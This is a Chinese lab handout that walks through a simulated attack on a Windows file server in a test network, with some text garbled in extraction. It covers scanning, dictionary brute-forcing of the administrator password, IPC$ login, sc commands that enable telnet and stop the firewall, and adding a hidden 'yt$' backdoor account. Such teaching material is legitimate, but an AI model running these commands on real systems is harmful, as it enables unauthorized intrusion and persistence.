1、1实验五 模拟黑客攻击实验环境:本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了 ,启动了防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。ABV M N e t 2文 件 服 务 器I P 1 . 1 . 1 . 1 / 8客 户 机I P 1 . 1 . 1 . 2 / 82需求描述: 扫描目标计算机 获得管理员权限 安装后门 清除攻击记录实验步骤:1、扫描目标计算机a) 在 B 计算机上使用扫描软件扫描目标计算机 A,确定开放的端口,判断操作系统的类型。b) 扫描软件推荐使用或流光。X-SCAN:34使用流光:打开流光主界面-右击 IPC
2、主机-编辑- 添加目标主机主机添加完后,生成字典-工具- 字典工具 -黑客字典III5生成字典右击目标添加的主机-探测- 探测所有 IPC$远程登录6配置字典探测报告72、获得管理员权限a) 根据扫描结果,尝试暴力破解管理员账户的密码。b) 、流光、等软件都提供了暴力破解功能。破解成功后会自动生成报告。3、入侵目标计算机a) 使用管理员的账户建立链接,命令为net use 1.1.1.1ipc$ 123456 /user:administrator。b) 使用 SC 命令获取目标计算机的所有服务列表,并保存在本地,命令为“sc 1.1.1.1 query type= service state
3、= all c:1.txt”8c) 打开 1.txt 文件,找到 telnet,确认 telnet 服务的状态。d) 去除 telnet 服务的禁用状态,设置为自动运行,命令为“sc 1.1.1.1 config tlntsvr start= auto”。然后启用 telnet 服务,命令为“sc 1.1.1.1 start tlntsvr” 。e) 停用目标计算机的 windows 防火,命令为“sc 1.1.1.1 stop sharedaccess”9f) 确认目标计算机启用了远程注册表服务,命令为“sc 1.1.1.1 qc remoteregistry”,如果服务为停止状态,则将其启动。4、添加隐藏账户a) 建立 telnet 连接,管理目标计算机,命令为“telnet 1.1.1.1”,连接成功后输入管理员的账户名和密码10b) 通过 telnet,在目标计算机上建立隐藏账户,命令为“net user yt$ 111 /add”,其中“$”符号用于在命令行里隐藏账户,但是在图形化管理工具里该账户还是可见的。c) 在本地运行“regedt32” ,在“注册表编辑器”中选择 “文件”“连接网络注册表” 。